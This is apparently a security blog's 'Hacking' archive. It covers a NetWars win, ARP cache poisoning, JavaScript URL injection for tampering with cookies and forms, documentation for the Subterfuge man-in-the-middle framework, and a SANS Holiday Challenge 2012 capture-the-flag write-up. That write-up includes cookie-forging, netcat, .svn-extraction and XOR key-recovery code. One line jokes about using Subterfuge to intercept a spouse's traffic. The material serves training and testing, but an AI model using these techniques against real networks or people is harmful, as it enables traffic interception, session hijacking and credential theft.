Category Archives: Hacking

NetWars — Tournament of Champions

Last week I competed in the NetWars Tournament of Champions competition put on by SANS at their annual Cyber Defense Initiative in Washington, D.C. It was a great opportunity to flex one’s cyber muscle. Here is a link to their press release on the event.

NetwarsThe competitive atmosphere was palpable and as the tournament began ramping up you could very nearly taste the excitement in the air. It was obvious when the scoring servers opened, because one hundred or so giddy hackers were instantaneously shrouded in a mantle of silence. Game time! I battled my way through progressively challenging obstacles to the beat of some of the most… interesting… music I’ve ever heard in my life, but at the end of day one I was actually only in 9th place overall. Walking back into the room on day two instantly transported you back into the zone, and if our monotone responses to Ed Skoudis’ enthusiastic questions were anything to judge by; we were raring to go. When they finally released the hounds, it was as if we had immediately run into a brick wall. The new NetWars is much more difficult than its predecessor. I’d have to say that that is what helped me; when things got hard I started to shine.

Exposure, if there were a word for what I took away from NetWars that would be it. While trolling the Internet for tricks and practicing them against your own network is great, I really think that the best way to develop the critical thinking skills necessary to be a real threat, is to be confronted with something new. The bad guys have it easy. There is an overabundance of new yet juicy targets for them to interdict, readily available on the web. For the ethical hackers among us acquiring this experience is much more difficult, and we need it if we are to keep the wolves at bay. NetWars Tournament of Champions was an all-new sequence of challenges that forced you to evaluate the problem, hypothesize potential solutions, and finally break in. There are few ways to improve your tradecraft that can compare.

On to the spoils! Everyone invited to the Tournament of Champions received exceedingly nifty, yet awkward to wear, sound activated, flashing shirts. Unintended bonus, you can swap in the batteries from your shirt if your Bluetooth keyboard runs out of juice, nice!

Grand prize at NetWars Tournament of Champions – The Golden Ticket:

goldenticket2You have won FIRST PLACE in the second annual SANS NetWars Tournament of Champions, an achievement of outstanding, astonishing proportions. Through in-depth knowledge, cutting-edge skills, and deep cunning, you secured victory!

As the ultimate winner, winner you will enjoy a trip to spend an amazingly geektastic day at NetWars Research World Headquarters. You’ll observe first-hand the NetWars super-secret lair and command center. Your exclusive travel voucher is valid for up to $500 in flight costs, plus one night of hotel accommodations, and entitles you to spend a full day with Ed Skoudis and his team, seeing how they design, build, and operate SANS NetWars challenges.

It gets even better. You’ll tour the steam punk office, a perfect blend of 1880’s design and cutting-edge technology, infused with a collection of historical crypto systems and curious gadgets. Your adventure will include the Secret Room, the Secret-Secret Room, and experiments with a genuine World War Two Enigma machine. You’ll also feast with Ed and the team at a nearby restaurant, geeking out with in-depth discussions of all things infosec.

But, wait, there’s more! Best of all, during your special day, you’ll get to experience the new SANS NetWars CyberCity. This miniaturized town, chock full of NetWars missions, is our most ambitious challenge ever, designed to teach cyber warriors how cyber action can have kinetic effect against real-world systems. As the ultimate NetWars champion, you’ll get serious bragging rights as you complete several CyberCity missions!

Hereby duly signed, with hearty congratulations, by:

Ed Skoudis, Yori Kvitchko

I also received a plaque commemorating my victory:

championplaque2

Finally, the scoreboard at the end of the competition!

NetWarsScoreboard

ARP Cache Poisoning

This page is currently under construction. The first draft is available, but more content must still be added be for the documentation is conclusive.  I apologize for the inconvenience.

Happy Hacking!

Click here to jump to ARP Poisoning with Subterfuge


ARP Cache Poisoning or ARP Spoofing is a network based attack that has been around for a long time; however, very little has been done address the vulnerability. The issue lies with the lack of authentication or even verification in the Address Resolution Protocol.  Though this attack is old it is still very effective, and if you think that it will be going away with IPv4 guess again. While the protocol has been removed in the IPv6 specification, the vulnerability still remains in a method call Neighbor Discovery Protocol, which is basically a very fancy rebranded ARP that solves problems in ARP’s network usage, but does nothing to fix the security issues.

Anatomy of the Attack

To understand ARP we first need to dive down into the network layers associated with it. Traffic traveling around your home network gets from one machine to another via layer 2 of the OSI model. More specifically, in a typical Local Area Network packets are switched not routed (as frames). This means that all that fancy TCP/IP overhead associated with the WAN is predominately a mute point. This makes our LANs much faster, but it also opens up these networks to additional strata of vulnerabilities. The Internet as we all know, uses IP addresses to get packets from one machine to another, but your LAN uses MAC address. In order to translate between the two standards, we have ARP.

So let us assume for a moment that your computer has an IP address it needs to send packets to: 192.168.1.1 and it is directly connected to the subnet 192.168.1.0/24 (this is the case with most home networks). Since it is connected to the same network as the target machine it must send the information as Ethernet frames, which means it needs the target’s MAC address not its IP. In order to get the MAC, it broadcasts to everyone on the network: ff:ff:ff:ff:ff (broadcast MAC address), and asks “Who has 192.168.1.1”. The response is supposed to be the MAC address of our destination.

Wireshark-ARP-Poison

In an ARP Spoofing attack all we have to do is respond to these requests with a different answer, namely, our MAC address. Now all traffic that you thought was going to 192.168.1.1 is actually going to the attacker instead. Furthermore, your computer remembers the last ARP response it gets, so if I spam these responses nonstop your computer will all ways use me as its target allowing me to sniff all the data you send to that host. If I poison your router, I can get all of your Internet traffic!


Subterfuge’s ARP Cache Poison

If you don’t care how Subterfuge does what it does, and you just want to know how to use it click here!

When we created Subterfuge (a framework to launch man-in-the-middle attacks) the first attack we gave it involved ARP Spoofing. We really wanted to stomp on the protocol, hard. Rather then just get the attack to work and release the product we spent a lot of time testing it against differing configurations and network devices. By its nature an ARP Cache Poison is a very unstable attack, and implementing it improperly can easily cause a denial of service against the target network. Naturally, this is not at all desired. Our research was focused on several key areas: Maintaining the Poison, Maximizing Stealth, and Network Stability.

Maintaining your Poison Versus Stealth & Stability

First we need to discuss the problem: losing a poison. How does it happen? On a typical network the router will occasionally send out a broadcast ARP packet letting anyone on the network know: “I’m still out there, and in case you were wondering here is my MAC Address”. That’s bad! Every time this happens we lose our poison against the network. When it comes to maintaining an ARP Poison most effectively there is one key: spam.  Because a client PC’s ARP table is always updated to reflect the most recent information it receives from the network, the best way to retain MITM is to send out as many poison packets as possible, but there’s a problem here. The primary reason ARP no longer exists in IPv6 is not security it’s overhead. Larger networks already tend to have so much ARP traffic that they experience a performance hit. Spamming packets as fast as your NIC can handle is definitely not the optimum solution from a network stability standpoint. Our research indicated that most routers tend to re-ARP a network anywhere between every 8-16 seconds.  To combat this Subterfuge by default poisons the network on an 8 second interval, but finer control is available through the settings page.

Unfortunately, this means that if you lose the poison you could be out of luck for up to 8 seconds. To combat this Subterfuge employs Dynamic ARP Retention, the concept here is that by listening on the wire for ARP messages from router you can hear the natural responses and spoof poison packets to match them. In practice this can cause an ARP storm on some networks and result in a denial of service condition. By default this setting is disabled; however, when enabled it can significantly bolster the stability of your attack. Lastly, you can adjust the rate of poison packets attacking the network manually from the settings page.

Poisoning with Subterfuge

Video coming soon!

Pentesting WebApps with Javascript URL Injection

Synopsis

Ever have to run a pentest sans tools? Breaking a WebApp can be a fairly tedious experience when your intercepting proxy has flown the coup. Believe it or not many of the functions you may be used to accomplishing through ZAP or Burpsuite can also be done in the URL bar of your browser! URL Injection is a great way to do anything from modifying your browser cookies to changing form data, to modifying arbitrary code on the web page.

Injection Basics

For starters lets take a look at how its done:

Basic URL Injection

 

 

 

The javascript alert function is the progenitor of those annoying popups that pervaded the internet in the nineties, and still exist on the sites of those web developers who haven’t pulled their heads out of a hole in over a decade. For our purposes the alert function is extremely handy. We can use it to quickly interrogate our browsers. The above command, for instance, will display current cookie values for our perusal. Your browser can be interrogated in the same way for just about any of the information that an intercepting proxy yields.

Some web developers handle authentication and session information with cookies. With the above URL Injection revealing this is trivial, and it’s normally one of the first things I do to any WebApp I’m pentesting. Getting information is all well and good, but how can we put this technique to more nefarious purposes?

Cookie Fraud

Javascript URL Injection is my preferred method of modifying web session cookies because it’s quick, easy, and because 60% of the time it works every time. This is most eloquently done with the void() function, though that can be left off.

More Eloquent:
javascript:void(document.cookie="MyCookie=MyValue")

Less Eloquent:
javascript:document.cookie="UserID=42"

The less eloquent method will direct you browser to a blank page (where it will execute your injection). Using that method you have to browse back to the original site for your edits to take the appropriate effect. It can; however, be easier to remember.

Modifying Form Data

One of the most useful aspects of an Intercepting Proxy is its ability to modify form data on the fly. In a pentest we can use this to fuzz the inputs of websites searching for anything from XSS flaws to SQL Injection vulnerabilities. This can also be done with URL Injection. Check it out:

javascript:void(document.forms[0].to.value="");

Editing Arbitrary Web Data

And finally for those moments when you have to edit some random html element on a page. There is the innerHTML function. Check out Google’s new facelift!

GoogleFaceLift

javascript:void(document.getElementById('lga').innerHTML="<img src='http://kinozoa.com/images/0sm0s1z.png' style='padding-top:112px'>")

Basically, we can specify an element on the webpage (in this case “lga”). Then using innerHTML we can edit the code in real time, replacing it with more useful stuff.

This function is also pretty nifty when you’ve MITM’d your spouse with Subterfuge and want to do some seamless edits… Because, You Know… Hacker…

 

Combine Subterfuge with Armitage Adversaries Beware!



Subterfuge and Armitage make a Terrific Duo!

Okay… So you can harvest creds like a boss… What else can you do with Subterfuge? In this video we combine Subterfuge and Rafael Mudge’s Armitage to unleash the full power of Metasploit on our foes!

This video is a good example of how we like to use Subterfuge, but whether it’s Armitage, msfconsole, or a homegrown exploit Subterfuge can send victims your way. In today’s much more security conscious age you are far more likely to turn a client side exploit into a successful pentest then the remote code execution vulnerabilities that pervaded the past decade.

On Armitage

Armitage gets a lot of flack from some MSF power users, but personally I find its integration with Metasploit’s RPC to be the most convient way to interact with the msfconsole. Mudge has put a ton of work into Armitage over the past couple of years. The result is a sleek, capable tool that just gets the job done. Thanks Rafi!

 

Armitage

 

Checkout his site: Strategic Cyber

Attack Breakdown

Difficulty – Intermediate

Attack Methods – ARP Cache Poisoning, HTTPS Downgrade, Java Signed Applet (Browser Exploit)

Subterfuge Documentation


Subterfuge5Wallpaper

Enter Subterfuge, a Framework to take the arcane art of Man-in-the-Middle Attacks and make it as simple as point and shoot. Subterfuge demonstrates vulnerabilities in the ARP Protocol by harvesting credentials that go across the network and even exploiting machines by injecting malicious code directly into their browsing sessions.

How to use this Document

Reading through this entire document may be tedious, and will certainly deluge you in information you may not have any desire in knowing. To aid in your perusal below is a short summary of each section, so that you know where to go in order to get the information that you came for:

Introduction

This section is for those of you who are interested in where the Subterfuge Project came from, why it exists, and what we hope to accomplish. The introduction focuses on the risks of MITM attacks, the programmatic structure of Subterfuge, and the community buoying it up.

                     The Attack

                     The next portion of the documentation gets right into running Subterfuge.  It starts with the most basic usage, and moves on to basic module usage as well as settings and configuration options. 

                     Modules

                     Extending the attack through Plugins and Modules. This section takes an in depth look at how Subterfuge can really work for you. 

                     Troubleshooting

                     The most pervasive problem with hacking tools is that they never quite work right for everyone. Between the plethora of different builds we operate, and the differing conditions of each attack breaking things is almost inevitable. Here’s what to do to fix it.

                     Third-Party Tool Integration

                     Subterfuge doesn’t exist in a vacuum, and we didn’t design it that way. Here we discuss the external tools that the project leverages, and how they interact with the framework to make the penetration testing experience more fluid and dynamic.

                     Extending Subterfuge

                     Making Subterfuge work for you is easy. This portion of the documentation talks about just how to get deeper functionality out of the system. 

                     Contributing to the Project

                     Community Support for the project has been great so far. If you would like to contribute in some manner then this section might merit your perusal. 

                     Appendices

                     Other stuff. See for yourself.

Installing Subterfuge on Kali Linux



Walkthrough

This is an install of Subterfuge Version 1.0. It takes place on a Virtual Box VM running Kali Linux 1.0.2. Packages were updated by running:

apt-get update
apt-get dist-upgrade

Step 1: Download the Code

Downloads

Step 2: Install Subterfuge

dpkg -i subterfuge_1.0-1_all.deb

Step 3: If the installer errors due to dependency issues install them along with Subterfuge

apt-get update && apt-get -f install

Because Subterfuge has deprecated its old installer and switched over to the Debian packaging system there should no longer be any chance that installing Subterfuge will break your existing packages!

Hopefully this install worked out for you all. Post in the comments if your issues still seem to persist, and we’ll try to help you work it out.

SANS Holiday Challenge 2012

The Year Without a Santa… Hack

Team:
Matthew Toussain (0sm0s1z)
Geoffrey Pamerleau (d0m3$t1c)
Christopher Shields (r00t0v3r1d3)

Thank you to Tim Medin, Ed Skoudis, and Tom Hessman for a fun Friday evening.


Guiding Questions

Where did you find the remainder of Snow Miser’s Zone 1 URL?

Snow Miser failed to utilize appropriate OPSEC measures. As such the remainder of his Zone 1 could be found in the reflection on his “Ice Cold Drink”. https://twitter.com/sn0w_m1s3r/status/276820932104957952/photo/1

What is the key you used with steghide to extract Snow Miser’s Zone 2 URL? Where did you find the key?

The key used was “IceIceBaby!”
I was located in the meta data of the off.jpg image

On Snow Miser’s Zone 3 page, why is using the same key multiple times a bad idea?

Using the same keys multiple times is a bad idea because if an attacker can deduce the key for one encryption they can use it to decrypt all messages, which were encrypted with the reused key. Since we had access to a combination of known plaintext and ciphertext we could determine the key used and then apply it to the encrypted Zone 4 URL.

What was the coding error in Zone 4 of Heat Miser’s site that allowed you to find the URL for Zone 5?

The PHP Header Redirect failed to specify exit() in order to force stop the execution of the remainder of the page.

How did you manipulate the cookie to get to Zone 5 of Heat Miser’s Control System?

Manipulating the UID cookie to the md5 of 1 allowed access to Heat Miser’s Zone 5 Control System.

Now for the real meat of the writeup:

Heat Miser – Write up:

Zone 0:

Viewing the source code gives us the KEY –> 1732bcff12e6550ff9ea44d594001418

 

Zone 1:

The solution to Zone 1 was simple once you read the HMISER Note on the Zone 0 page:

We had a security concern where the Zone 1 URL ended up in search engine results. We added a file to prevent the search engines from caching these pages. The system is now secure and no unauthorized users have access to the URL.

Search engines use the Robot Exclusion Standard to gain information on what pages on any given website are publically viewable. Participating Web Crawlers check for the existence of a robots.txt file to determine the pages on the web site to exclude.

For our purposes, browsing to this file yields the URL of Heat Miser’s Zone 1 Controller: http://heatmiser.counterhack.com/zone-1-E919DBF1-E4FA-4141-97C4-3F38693D2161/

Viewing the source gives us the KEY –> d8c94233daef256c42bb95bd61382e02

 

Zone 2:

The HIMSER Note on the Zone 1 page indicates that a link to Zone 2 existed at one time. Viewing the page source reveals the following comment:

<!-- redacted, too many people clicked on the link and took it offline
<a href="/zone-2-761EBBCF-099F-4DB0-B63F-9ADC61825D49">Zone 2</a>
-->

Copying the zone information to the URL bar grants us access to Zone 2. Viewing the source code gives us the KEY –> ef963731de7e886226fe4a6a6c2971f1

 

Zone 3:

Heat Miser gives us the first portion of the link to get to Zone 3:

“zone-3-83FEE8BE-B1C6-4395-A56A-XXXXXXXXXXXX”

But to get to Zone 3 we need a little bit more information. It helps to stalk our targets! @sn0w_m1s3r gives us our first clue:

“Another oops. Brilliant move @h34t_m1s3r. Your OS X term is semi-transparent, hot head! Oh, & u don’t need Metasploit for any of these zones”

Following the breadcrumbs brings us to a tweet by @h34t_m1s3r:

“Hot dog! We have some toolz ready in case we need them later pic.twitter.com/UfyCjJ9P

If we analyze the image we can see the URL bar of Heat Miser’s browser through his transparent terminal. Opening the image in Gimp and adjusting the brightness and levels makes the image easier to read. Putting the pieces together gives us the new link:

“http://heatmiser.counterhack.com/zone-3-83FEE8BE-B1C6-4395-A56A-BF933FC85254/”

Viewing the source code gives us the KEY –> 0d524fb8d8f9f88eb9da5b286661a824

 

Zone 4:

Zone 3 gives us the link to Zone 4 right off the bat! Accessing the Control System on the other hand is not quite so straightforward. Browsing to the supplied link executes a PHP Header redirect sending the browser to noaccess.php. Snow Miser gives us a hint:

exit()

What he is referring to is an open redirect in Heat Miser’s code. The PHP code causing the redirect looks something like the following:

<?php
header('Location: http://heatmiser.counterhack.com/zone-4-0F2EA639-19BF-40DD-A38D-635E1344C02B/noaccess.php');
?>

The problem results because Heat Miser failed to call exit() after the redirect. This means that the server continues to execute the rest of the code on the page. To access this code all that we need to do is navigate to the site with a browser that does not support PHP redirection. For our purposes we used Netcat:

nc heatmiser.counterhack.com 80
GET http://heatmiser.counterhack.com/zone-4-0F2EA639-19BF-40DD-A38D-635E1344C02B/ HTTP/1.0

This pulls down the source and reveals the link to Zone 5 as well as the KEY –> e3ae414e6d428c3b0c7cff03783e305f

 

Zone 5:

Zone 5 is interesting… On first inspection it appears much the same as zone four, except for one major difference: cookies. Zone 5 uses cookies to authenticate a user before allowing access to the weather controller.  Inspecting the cookie by pasting javascript:alert(document.cookie) into the URL bar shows us what it is set to: UID=b8c37e33defde51cf91e1e03e51657da reversing the hash (we used www.md5rainbow.com) reveals that the UID is set to the md5 of 1001. That is a standard user identification number under Linux systems. Using that schema the next step was to try changing the UID in order to privilege escalate. We originally tried 0 for root, but it was using a UID of 1 that gave us access:

javascript:void(document.cookie=”UID= c4ca4238a0b923820dcc509a6f75849b”)

We changed our cookie with the above URL injection, reloaded the page (Zone 5 not noaccess.php), and presto we’re in!

Viewing source gives us the KEY –> f478c549e37fa33467241d847f862e6f

Heat Miser Answers at a Glance:

Screen Shot 2013-06-24 at 6.38.19 PM




 

Snow Miser – Write up:

­­­­ Zone 0:

Viewing the source code gives us the KEY –> 1732bcff12e6550ff9ea44d594001418

 

Zone 1:

Snow Miser’s a bit too fond of his ice cold drinks! Someone should give tell him to use proper OPSEC because the link to his zone 1 URL is in the reflection on his glass. Flipping it horizontal and 180 degrees gives us the rest of the URL for Zone 1:

“F9CDB3AF6226”

Viewing the source code gives us the KEY –> 38bef0b61ba8edda377b626fe6708bfa

 

­­­­Zone 2:

Snow Miser let’s us know that because of one of his snow-minions we have to do image analysis in order to get the URL for Zone 2. Step one is finding the image. The first trick is to get an image with a format that Steghide can use. Viewing the source to pull page resources shows us on.png, but if we click on the disable button. The resource changes to: off.jpg. Downloading the image and using exiftool on us gives us some notable metadata namely the passphrase:

“IceIceBaby!”

The next step is to run steghide with the extract switch while specifying the above as the passphrase. Welcome to Zone 2!

“http://snowmiser.counterhack.com/zone-2-6D46A633-25D7-42C8-AF94-8E786142A3E3/”

Viewing the source code gives us the KEY –> b8231c2bac801b54f732cfbdcd7e47b7

 

Zone 3:

One of Snow Miser’s minions has been running rampant and messing up the Global Chiller Control System links! In order to facilitate access Snow Miser provides the first part of the Zone 3 URL for his authorized minions:

“zone-3-EAB6B031-4EFA-49F1-B542-XXXXXXXXXXXX”

 Additionally, his fraternal nemesis has left us a whopper on Twitter:

“@h34t_m1s3r: Uh oh, @sn0w_m1s3r left his Ice Cream Sandwich Android phone at my volcano. Data extraction complete.”

From here we get the android file system of Snow Miser’s phone, jackpot! We check the browser cache with some Terminal Fu to see if he’s accessed the Chiller System from his phone:

“strings data/com.android.browser/cache/browser_state.parcel | grep zone-3-EAB6B031”

Yay! Link:

“http://snowmiser.counterhack.com/zone-3-EAB6B031-4EFA-49F1-B542-30EBE9EB3962/”

Viewing the source gives us the KEY –> 08ba610172aade5d1c8ea738013a2e99

 

Zone 4:

Zone 3 Control System… almost there right? Look out, incoming crypto! Fortunately, Snow is kind enough to give us samples of his plaintext and ciphertext, “for verification purposes” of course:

Old Plaintext:

zone-4-F7677DA8-3D77-11E2-BB65-E4BF6188709B

Old Ciphertext

20d916c6c29ee53c30ea1effc63b1c72147eb86b998a25c0cf1bf66939e8621b3132d83abb1683df619238

New Ciphertext: 20d916c6c29ee54343e81ff1b14c1372650cbf19998f51b5c51bf66f49ec62184034a94fc9198fa9179849

Doing some careful eyeballing gives us some clues on how to start:

Old Plaintext:             z    o   n   e   –   4   –
Old Ciphertext:          20 d9 16 c6 c2 9e e5
New Ciphertext:        20 d9 16 c6 c2 9e e5

Let’s examine what we know. The ciphertext is exactly twice as long as the plaintext, and both sets of plaintext (the URLs) must start with zone-4-. The first 14 characters of both new and old ciphertexts were identical which aligns with the “zone-4-“. This gave us the hint that the same key was used to encrypt both the original and the old URL’s. On to the Python!

Our less then elegant solution……….

“knownpt = "zone-4-F7677DA8-3D77-11E2-BB65-E4BF6188709B"

knownct = "0x20 0xd9 0x16 0xc6 0xc2 0x9e 0xe5 0x3c 0x30 0xea 0x1e 0xff 0xc6 0x3b 0x1c 0x72 0x14 0x7e 0xb8 0x6b 0x99 0x8a 0x25 0xc0 0xcf 0x1b 0xf6 0x69 0x39 0xe8 0x62 0x1b 0x31 0x32 0xd8 0x3a 0xbb 0x16 0x83 0xdf 0x61 0x92 0x38"

knownctarray = knownct.split(" ")

unknownct = "0x20 0xd9 0x16 0xc6 0xc2 0x9e 0xe5 0x3c 0x30 0xea 0x1e 0xff 0xc6 0x3b 0x1c 0x72 0x14 0x7e 0xb8 0x6b 0x99 0x8a 0x25 0xc0 0xcf 0x1b 0xf6 0x69 0x39 0xe8 0x62 0x1b 0x31 0x32 0xd8 0x3a 0xbb 0x16 0x83 0xdf 0x61 0x92 0x38"

keyarray = unknownct.split(" ")

cttobreak = "0x20 0xd9 0x16 0xc6 0xc2 0x9e 0xe5 0x43 0x43 0xe8 0x1f 0xf1 0xb1 0x4c 0x13 0x72 0x65 0x0c 0xbf 0x19 0x99 0x8f 0x51 0xb5 0xc5 0x1b 0xf6 0x6f 0x49 0xec 0x62 0x18 0x40 0x34 0xa9 0x4f 0xc9 0x19 0x8f 0xa9 0x17 0x98 0x49"

cttobreakarray=cttobreak.split(" ")

count = 0
for c in knownpt:
   for i in range (256):
      result = hex(ord(c)^i)
      if result == knownctarray[count]:
         #print hex(i)
         keyarray[count]=hex(i)
         #print result
   count = count + 1
answer = ""
for i in range(43):
   answer=answer+chr(int(keyarray[i],0)^int(cttobreakarray[i],0))
print "The URL for Zone 4 is: " + answer

Since the length of the cipher text is exactly twice that of the plaintext we determined that Snow Miser took the ASCII of the URL and converted each character to hexadecimal. The plaintext was then encrypted using a byte-wise XOR with a one time pad (the key). XOR was assumed to be the operation performed on the two sets of bytes because an encryption algorithm is not a true encryption algorithm without XOR…right? Normally, this type of encryption would be impossible to reverse; luckily for us we were provided with a plaintext/ciphertext pairing. The python program allowed us to determine the key byte-by-byte. Once we had the key we could easily decrypt the posted ciphertext to obtain the Zone 4 URL we desired. The mess of Python above spits out the Zone 4 URL:

“zone-4-9D469367-B60E-4E08-BDF1-FED7CC74AF33″

Viewing the source gives us the KEY –> de32b158f102a60aba7de3ee8d5d265a

Zone 5:

Zone 5 is top secret! Fortunately, the link to its URL can be found in the source code:

“/zone-5-89DE9B26-CF7D-4B07-88DE-7A2F0A7B16FE/”

Additionally, Snow gives us the hint that the code is now part of an svn package management system (version 1.7). This means that we can pull down the Subversion Sqlite database by browsing to it:

“ http://snowmiser.counterhack.com/zone-5-89DE9B26-CF7D-4B07-88DE-7A2F0A7B16FE/.svn/wc.db.”

Heat Miser gives us a clue on what to do from here by linking to a blog post by Tim Medin entitled: “All your svn are belong to us”

“http://pen-testing.sans.org/blog/pen-testing/2012/12/06/all-your-svn-are-belong-to-us”

We open the database, check the table definitions (schema) to give ourselves a reference point, and grab the NODES:

sqlite3 wc.db
.schema
select local_relpath, ".svn/pristine/" || substr(checksum,7,2) || "/" || substr(checksum,7) || ".svn-base" as alpha from NODES;

This spits out the golden egg:

noaccess.php|$sha1$4134e0e954d144ed932fd639b5a897f9ad47fff9
index.php|$sha1$7d63810b0da679648fc20b4f1c84680ac08ec872

The next step is get to the Zone 5 Controller. Execute the following:

wget –O - http://snowmiser.counterhack.com/zone-5-89DE9B26-CF7D-4B07-88DE-7A2F0A7B16FE/.svn/pristine/41/4134e0e954d144ed932fd639b5a897f9ad47fff9.svn-base

wget –O - http://snowmiser.counterhack.com/zone-5-89DE9B26-CF7D-4B07-88DE-7A2F0A7B16FE/.svn/pristine/7d/7d63810b0da679648fc20b4f1c84680ac08ec872.svn-base

This returns the following output:

<?php
$accessallowed = FALSE;
$zone=5;
$content = "<h1>Access Denied</h1>\n<!-- current server time is ".date('Y-m-d H:i').' -->';
require_once('../include/template.inc.php');

----------------------------------------------------------------------------------

<?php
function generate_otp($time) {
$pass = sha1("$time 7998f77a7dc74f182a76219d7ee58db38be3841c");
return($pass);
}

function verify_otp($inpass) {
    // passwords are valid for up to 3 minutes
    // don't forget to use the server time (see the noaccess.php page)

$validstamps = array(
    date('Y-m-d H:i', strtotime('+1 minute')), // added just in case the time sync is off
date('Y-m-d H:i'),
date('Y-m-d H:i', strtotime('-1 minute')),
date('Y-m-d H:i', strtotime('-2 minute')),
);

foreach ($validstamps as $stamp) {
   if (strtolower($inpass) == generate_otp($stamp))

        return TRUE;
}
return FALSE;
}

if ((array_key_exists('otp', $_POST) && verify_otp($_POST['otp'])) || (array_key_exists('otp', $_COOKIE) && verify_otp($_COOKIE['otp']))) {
    setcookie('otp', generate_otp(date('Y-m-d H:i')));
} else {
header( 'Location: noaccess.php' );
die();
}

$accessallowed = TRUE;
$zone=5;
require_once('../include/template.inc.php');
?>

Uh oh! Access Denied, but we did manage to get some of the server side code pertaining to the Controller’s Page. Examining it gives us insight. We need to hand the server a password in order to gain access to the Controller. Fortunately, noaccess.php tells us how to make a time based password, but to do that we need to get ahold of the server time. The server time can be found in the source of noaccess.php. Back to the Python!

import hashlib
salt = 7998f77a7dc74f182a76219d7ee58db38be3841c
hashlib.sha1(“2012-12-16 20:17 ” + seed).hexdigest() 

Output:           f614951b7f741dbbead5d47d285fcc47b1e63aec

We now have a three minute window to take the output and authenticate into the Zone 5 Controller from the Zone 4 page. That’s it!

Viewing the source gives us the KEY –> 3ab1c5fa327343721bc798f116be8dc6

Snow Miser Answers at a Glance:

Screen Shot 2013-06-24 at 7.03.55 PM

 

And that’s it! Hope you all enjoyed the writeup.

Appendices

Appendix A: Subterfuge Functions

Setting your SYS Path

In order to access the resources in Subterfuge’s main directory

import sys

sys.path.append(‘/usr/share/subterfuge/’)

sys.path.append(‘/usr/share/subterfuge/utilities’)

This adds the main Subterfuge directory as well as the primary utilities directory into your program’s path. From there you can simply call built in functions and utilities without having to specify an absolute location every time.

How to Get Global Variables

Getting the global attack variables in Subterfuge is simple. Just add the following line to the header of your code:

from subutils import globalvars

The next step is to call the function and assign the output:

globalvar = globalvars()

The function: globalvars() returns a dictionary of all of the attack variables accessed from the database. Accessing a specific entry in the dictionary is simple:

print globalvar[‘gateway’]

The above code will print the LANs default gateway as noted by Subterfuge. You can use this same method to access other global attack information including the following tuples (located in the main_setup table):

Tuple

Description

ip

The IP Address of the Subterfuge Machine

iface

The interface used in the attack

gateway

The original default gateway of the LAN

autoconf

A Boolean value that determines whether auto-configuration is active

ploadrate

The interval over which Subterfuge refreshes attack information

injectrate

The interval Subterfuge waits between code injection

arprate

The interval Subterfuge waits between sending arp packets

smartarp

A Boolean value that determines whether Dynamic Poison Retention is active

routermac

The MAC Address of the LANs router

autoupdate

A Boolean value that determines whether Subterfuge checks for updates automatically on startup.

 

Adding Additional Logic to Third Party Modules

The Subterfuge Module Builder automates the standard configuration of a module for you, but often you need to have just a bit more control. What follows is a short primer on how to do just that.

The file that handles Subterfuge’s modules is: modules/views.py. The default code generated by Subterfuge looks like this:

#################################

#TUNNEL BLOCK MODULE

#################################

def tunnelblock():

os.system(‘python’+ str(os.path.dirname(os.path.abspath(__file__))) + ‘/TunnelBlock/TunnelBlock.py’)

 

You can modify or add any code here to produce the result that you want. For instance, in the HTTP Code Injection Module we needed a bit more control, and features. What we ended up with is this:

#################################

#HTTP CODE INJECTION MOD

#################################

def httpcodeinjection(request, conf):

#HTTP CODE INJECTION MODULE CONFIGURATION

#Status

status = request.POST[“status”]

#Vector

if request.POST[“vector”]:

exploit = request.POST[“vector”] + “\n”

method = “metasploit”

#Payload

if request.POST[“payload”]:

payload = request.POST[“payload”] + “\n”

if request.POST[“custominject”]:

exploit = “”

payload = “”

method = “custom”

#Write Custom Inject into File

with open(str(os.path.dirname(__file__)) + ‘/httpcodeinjection/inject.x’, ‘w’) as file:

file.writelines(request.POST[“custominject”])

installed.objects.filter(name = “httpcodeinjection”).update(active = status)

os.system(‘xterm -e sh -c “python ‘ + str(os.path.dirname(os.path.abspath(__file__))) + ‘/httpcodeinjection/httpcodeinjection.py ‘ + method + ‘ ‘ + payload + ‘” &’)

 

Note: Module code is typically stored under the following naming scheme:
          modules/<modulename>/<modulename>.py

 

Using the Subterfuge Notification System

Subterfuge is capable of sending alerts and notifications to users. The file that handles this interaction is: utilities/notification.py. Notifications serve a dual purpose of providing error logging and troubleshooting guidance. To add your own notifications run the program with the following syntax:

os.system(“python notification.py ‘title’ ‘message’”)

Appendix B: Subterfuge Database

Basics on the Subterfuge Database

Subterfuge uses a SQLite database due to the system’s portability. This database is further accessed with Django’s library. This makes accessing the database fairly simple if syntactically different then you may be familiar with. For queries not covered here you may wish to reference Django’s documentation[1].

Select Statement:

creds = credentials.objects.all()

Insert Statement:

logcred = credentials(username = username, password = password)                  logcred.save()

Update Statement:

setup.objects.update(value = newvalue)

 

That’s all it takes to do basic database operations in Subterfuge; however, in order to include database queries in a file outside of views.py you may need to import the following:

#Ignore Deprication Warnings  import warnings  warnings.filterwarnings(“ignore”, category=DeprecationWarning) from django.conf import settings

#Configure Database

settings.configure(DATABASE_ENGINE=”sqlite3″,

DATABASE_HOST=””,

DATABASE_NAME= os.path.dirname(__file__) + “/db”,

DATABASE_USER=””,

DATABASE_PASSWORD=””)

from django.db import models

#Import Tables

from main.models import *

 

Using the Subterfuge Database in your Modules

To access Subterfuge’s Database from your modules you must first import several dependencies.

 

 

 

 

References:

 

Special Thanks to:

Maj David Merritt

Lt Christopher Shields ~ r00t0v3rr1d3

n37tdiv3r5

 

References for Frontend Development =

Django Template Language:

https://docs.djangoproject.com/en/dev/topics/templates/

Python Programming Language:

http://docs.python.org/

 

SANS WPAD Hijacking:

http://it-audit.sans.org/blog/2011/10/03/browser-security-man-in-the-middle-with-wpad

 

[1] Barber, R. (2011, August 30). Security Science. Retrieved from Computer Fraud & Security Volume 2001, Issue 3.

[2] Kurose, J. and Ross, K. Computer Networking: A Top-Down Approach. 5th Edition. Addison-Wesley. Page 61

[3] Saltzman, R. (2011, August 30). Security Science. Retrieved from OWASP: http://www.security-science.com/pdf/active-man-in-the-middle.pdf

[4] Leitch, S. (2009). Security Issues Challenging Facebook. Retrieved from Edith Cowan University Research Online: http://ro.ecu.edu.au/cgi/viewcontent.cgi?article=1017&context=ism&sei-redir=1#search=%22facebook%20secure%22

[5] Wagner, R. (2011, August 30). Address Resolution Protocol Spoofing and Man-in-the-Middle Attacks. Retrieved from http://savannah.gatech.edu/people/lthames/dataStore/WormDocs/arppoison.pdf

[6] Norton, D. (2011). An Ettercap Primer. SANS Institute, 1-27.

